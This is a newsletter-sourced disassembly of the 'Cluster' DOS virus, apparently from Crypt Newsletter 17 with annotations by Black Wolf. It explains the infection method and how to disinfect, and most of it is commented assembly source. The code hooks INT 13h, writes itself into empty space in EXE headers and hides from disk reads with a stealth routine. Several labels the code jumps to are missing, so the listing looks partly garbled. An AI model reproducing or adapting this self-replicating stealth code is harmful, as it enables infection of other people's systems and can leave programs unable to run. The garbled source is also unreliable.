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;The Cluster virus is an interesting experiment which works, almost.
;It it what has come to be known as an 'intended' virus, although a
;a very slickly done one.
;Credited to the TridenT virus programming group, Cluster uses some of
;the ideas of the Bulgarian virus known as The Rat. The Rat was deemed
;tricky because it looked for "00" empty space below the header in
;an EXEfile - if it found enough room for itself, it wrote itself out
;to the empty space or "air" in the file. This hid the virus in the
;file, but added no change in file size. This is a nice theme - one
;made famous by the ZeroHunt virus which first did the same with
;.COMfiles. In both cases, the viruses had to be picky about the
;files they infected, limiting their spread.
;Cluster is similar to The Rat. It will attempt to copy itself into
;the "air" in an EXEfile just below the file header, if there is
;enough room. The most common candidates for infection are standard
;MS/PC-DOS utility programs, like FIND or FC, among others.
;As is Cluster will go resident from the "germ" supplied with the
;newsletter. On copy, if the candidate .EXEfile has enough "00"
;air, Cluster will infect it. In other words, any .EXEfile
;written to will be inspected by Cluster.
;Because Cluster installs its own INT 13 disk hander, it then can
;intercept all attempts to open infected files for a quick look.
;For example, looking at a hex dump of a Cluster-infected .EXE,
;with Vern Berg's LIST, will show the files clean. Now, boot
;the system clean and look again. You'll see Cluster in the file's
;"00" space - look for the funny "Zugu" signature.
;However, almost all files infected by Cluster under DOS 5.0 and 6.0
;are mishandled in such way that they cannot execute properly except
;when the virus is not resident. Normally, what happens is Cluster
;will go resident and the system will hang. And this is what is
;meant by an 'intended' virus - Cluster is very infectious, but only
;infectious on a machine which is contaminated with the "germ" file
;supplied by TridenT. Although Cluster may behave better on other
;platforms, it's not viable on most of the systems rolling out
;of shops today.
;Additional notes and disassembly are all Black Wolf's. --Urnst Kouch
;Crypt Newsletter 17.
;This virus goes memory resident at the top of lower memory and hooks
;Int 13h. Whenever an EXE file header is written, it checks to see
;if there is a large field of 0's inside it (VERY common in EXE's)
;and, if so, will put itself inside it and change the exe marker bytes
;'MZ' to a jump to that code. In this way, it effectively converts the
;file to a COM file when it is run. After this it re-executes the EXE
;file. Because of a stealth handler on Int 13h function 2 (absolute
;disk read) the EXE file is read as it originally was (the handler
;zero's out the field in which it resides and restores the jump to
;'MZ'). Because of the way this virus works, it can only infect
;smaller EXE files.
;Several commands are commented out and have the actual bytes entered
;next to them instead. This is because the compiler that Clust was
;originally compiled on used different translations than mine, and
;I wished to preserve the EXACT virus code.
;Disinfection: Because of this virus' stealth routine, disinfection should
; be possible simply by Zipping or Arjing all EXE files on an
; infected disk, then rebooting from a clean disk and unarchiving
; the files. The original archiving MUST be done while the
; virus is active in memory. Also - after rebooting - make
; sure the program you use to unarchive the files is _NOT_
; infected.
;Disassembly by Black Wolf
.model tiny
org 100h
jmp short EntryPoint
LotsaNOPs db 122 dup (90h) ;Usually will be EXE header....
OldInt13 dd 0
db 0e9h,7ch,0 ;jmp InstallVirus
cmp ah,3
je IsDiskWrite
cmp ah,2
jne GoInt13
call cs:OldInt13 ;Call Int 13h
jc Exit13Handler ;Exit on error.
cmp word ptr es:[bx],7EEBh ;Is sector infected?
jne Exit13Handler
mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ'
push di cx ax ;Stealth routine.....
mov cx,115h
xor ax,ax
db 89h,0dfh ;mov di,bx
;Zero out virus from
add di,80h ;sector when it is read.
rep stosb
pop ax cx di
jmp cs:[OldInt13]
cmp word ptr es:[bx],5A4Dh ;Is EXE file being written?
jne GoInt13
cmp word ptr es:[bx+4],75h ;Is file too large?
jae GoInt13
push ax cx si di ds
push es
pop ds
db 89h,0deh ;mov si,bx
add si,80h ;Look in EXE header....
mov cx,115h
cmp al,0
loopz AllZeros
cmp cx,0 ;Check to see if entire field
jne ExitInfectHandler ;was zeroed - leave if not.
db 89h,0dfh ;mov di,bx
add di,80h
mov cx,115h
mov si,offset OldInt13
push cs
pop ds
rep movsb
db 89h,0dfh ;mov di,bx
;Copy virus
;over zero area in EXE header.
mov ax,7EEBh ;Stick in Jump over 'MZ'
pop ds di si cx ax ;Allow Write to process now.
jmp short GoInt13
mov ax,3513h
int 21h ;Get Int 13 addres
mov word ptr cs:[OldInt13],bx
mov word ptr cs:[OldInt13+2],es
mov ah,0Dh
int 21h ;Flush disk buffers
mov ah,36h
mov dl,0
int 21h ;Get free space on default drive
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:0,'Z' ;Are we the last chain?
jne Terminate ;If not, terminate.
;sub word ptr ds:[3],39h ;subtract from MCB size
db 81h,2eh,03,0,39h,0
;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem
db 81h,2eh,12h,0,39h,0
mov si,offset OldInt13
db 89h,0f7h ;mov di,si
mov es,ds:[12h] ;ES = new segment
push cs
pop ds
mov cx,115h ;Copy virus into memory
rep movsb
mov ax,2513h
push es
pop ds
mov dx,offset Int13Handler
int 21h ;Set int 13 to virus handler
mov ah,4Ah
push cs
pop es
mov bx,39h
int 21h ;Modify mem alloc.
push cs
pop ds
mov bx,ds:[2ch] ;Get environment segment
mov es,bx
xor ax,ax
mov di,1
ScanForFilename: ;Find name of file executed
dec di ;in environment strings...
scasw ;(located after two 0's)
jnz ScanForFilename
lea si,[di+2]
push bx
pop ds ;DS = environment segment
push cs
pop es ;ES = code segment
mov di,offset Filename
push di
xor bx,bx
mov cx,50h
inc bx
cmp al,0
jne StoreFilename ;Change zero at end of
mov al,0Dh ;filename to a return
cmp al,0Dh ;If it was a return, we're
loopnz CopyFilename ;done copying the filename
mov byte ptr ds:[28fh],bl
push cs
pop ds
pop si
dec si
int 2Eh ;Re-execute EXE file with
;Stealth handler in memory,
;so Exe is run w/o virus.
;here we go, infected program
Terminate: ;only executes properly when
mov ah,4Ch ;Cluster is resident.
int 21h
db 0
Filename db 1
end start